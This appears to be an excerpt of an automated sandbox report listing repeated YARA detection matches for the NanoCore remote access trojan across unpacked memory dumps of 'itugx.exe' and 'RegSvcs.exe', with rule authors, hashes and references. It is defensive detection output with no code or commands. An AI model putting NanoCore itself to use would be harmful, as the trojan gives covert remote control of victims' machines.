Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
